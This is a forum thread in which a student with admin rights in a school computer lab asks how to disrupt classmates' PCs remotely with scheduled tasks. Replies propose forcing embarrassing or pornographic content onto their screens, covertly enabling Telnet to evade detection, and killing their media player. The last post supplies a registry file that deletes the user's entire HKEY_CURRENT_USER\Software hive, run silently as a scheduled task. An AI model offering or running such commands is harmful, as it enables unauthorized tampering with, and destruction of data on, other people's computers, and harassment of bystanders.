I'm sitting in a open lab, with 15+ others at school

I checked what I can do to their computer through the network - I can schedule a task.

What do I schedule to run that will really mess them up and stop the music?

I happen to have enough admin rights to run these programs on the lab PCs, being an IT student at the school.

For example, defrag, cmd, msconfig..?

Surely you can get more evil than THAT. Figure out a way to get it to open an IE window with gay pr0n or something.

If you don't want to be evil, just make a message pop up that says "STOP PLAYING ANNOYING RINGTONES, IT'S PISSING ME OFF --YOUR FRIENDLY COLLEGE HACKER"

um....

They don't need any help with that.

I could ask them to stop, but what fun is that?

lol I started a defrag. Their ringtones got all choppy and messed up.

Why do lab computers even have speakers beyond the internal one for system beeps & such.

Or is it the internal speaker?

Couldn't you have the default audio player open up and play an arbitrary sound file that might embarass them? That would convince them to turn down/off their speakers ...

I don't know how to control what WMP plays when it opens. I have to run it as a scheduled task.

So far they've got cmd, msconfig, defrag, and scandisk running...

You just load up the file that you want to play. The only problem would be controlling the volume from your computer.

If you have admin rights, you can always install the Remote Task Manager on your system, and then use it to nuke whatever program they are using to play the files.

Edit:

You could just do this by hand by starting up the Windows Telnet service on their system (system32\tlntsvr.exe) and then using the remote admin stuff in there. That is a little more covert than installing a completely new service, and you might not get in as much trouble if you get caught.

Either way though, if you actually went through with this you should expect to get caught by a watchful network admin and appropriately punished.

And finally, you could drop this on their system, and then schedule a task to run it (something like "process -k wmplayer.exe").

Why not jus ask them to stop and be done with it instead of wasting all this time. Maybe you just don't have the balls to do it, so instead you come ask a bunch of strangers what you can do while hiding behind a computer.

Wow, OP is one of those people who complain about something but won't take any action. No balls indeed.

You guys have no life but to make up things that make you feel like (stress feel like) you're the most manly of men.

I had 30 mins to waste time in a lab before class. I'm having finals and have studied more than I need to already. I had nothing better to do than to surf anandtech (no offense). Someone was being disruptive. If anoyone in the lab had cared to ask them to stop, they would have. I owuld have asked them to stop if it was really that annoying to me. Instead, I wanted to have some fun with them and you guys come back and say i have no balls because I won't ask them to stop.

Get a life and quit doing everything you do to make yourself feel better. Real men don't have to disrespect others to be confident of themselves.

Paste this into Notepad:

Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software]

Save it as die.reg or something. Stick it on a drive that the other PC can get to.
Schedule a task of "regedit /s <nameoffile>"

Wait.
